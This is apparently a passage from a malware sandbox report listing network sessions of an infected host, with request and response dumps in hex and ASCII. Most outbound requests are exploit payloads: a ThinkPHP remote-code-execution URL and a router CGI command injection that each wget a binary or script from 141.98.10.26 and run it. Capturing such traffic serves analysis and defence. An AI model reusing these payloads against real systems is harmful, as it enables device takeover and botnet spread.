charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
205	192.168.2.23	33654	95.100.59.211	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:30.021454096 CET	4843	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:30.214333057 CET	4847	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:30 GMT Date: Wed, 22 Nov 2023 07:38:30 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 34 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 31 30 26 23 34 36 3b 32 63 64 31 39 61 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.24161502.1700638710.2cd19a1</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
206	192.168.2.23	58064	95.101.190.7	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:30.026963949 CET	4844	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:30.225629091 CET	4848	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:30 GMT Date: Wed, 22 Nov 2023 07:38:30 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 37 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 31 30 26 23 34 36 3b 61 35 66 34 31 64 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.670b1502.1700638710.a5f41d3</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
207	192.168.2.23	45838	112.156.253.251	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:30.477212906 CET	4881	IN	HTTP/1.0 400 Bad Request Content-type: text/html Date: Wed, 22 Nov 2023 07:38:30 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Unsupported method</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
208	192.168.2.23	39118	95.164.131.123	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:30.707170963 CET	4945	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:30.807950020 CET	4949	IN	HTTP/1.1 400 Bad Request Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Wed, 22 Nov 2023 07:38:30 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3572 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, s

Session ID	Source IP	Source Port	Destination IP	Destination Port
209	192.168.2.23	56618	94.121.67.161	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:30.829926968 CET	4953	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
210	192.168.2.23	48366	31.222.233.93	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:30.833693027 CET	4954	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
211	192.168.2.23	41734	94.183.142.209	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:30.904459000 CET	4955	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.203679085 CET	4961	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Sep 2023 11:09:21 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
212	192.168.2.23	34214	85.69.32.219	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:30.988033056 CET	4956	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.534127951 CET	5073	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:32.654053926 CET	5125	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:35.021645069 CET	5442	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:39.628973961 CET	6043	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:48.587727070 CET	7092	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:07.529062986 CET	9505	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:44.388010025 CET	13935	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
213	192.168.2.23	49574	94.187.96.75	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.026515007 CET	4956	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
214	192.168.2.23	42454	62.29.30.131	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.034718990 CET	4957	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
215	192.168.2.23	38186	94.122.107.92	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.049493074 CET	4958	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
216	192.168.2.23	49920	95.111.198.202	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.408524036 CET	5065	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.790508986 CET	5084	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:38:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0

Session ID	Source IP	Source Port	Destination IP	Destination Port
217	192.168.2.23	53992	95.164.206.148	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.509159088 CET	5072	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.609697104 CET	5075	IN	HTTP/1.1 400 Bad Request Server: squid/3.5.20 Mime-Version: 1.0 Date: Wed, 22 Nov 2023 07:38:31 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3560 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ezproxies.com X-Cache-Lookup: NONE from ezproxies.com:8080 Via: 1.1 ezproxies.com (squid/3.5.20) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 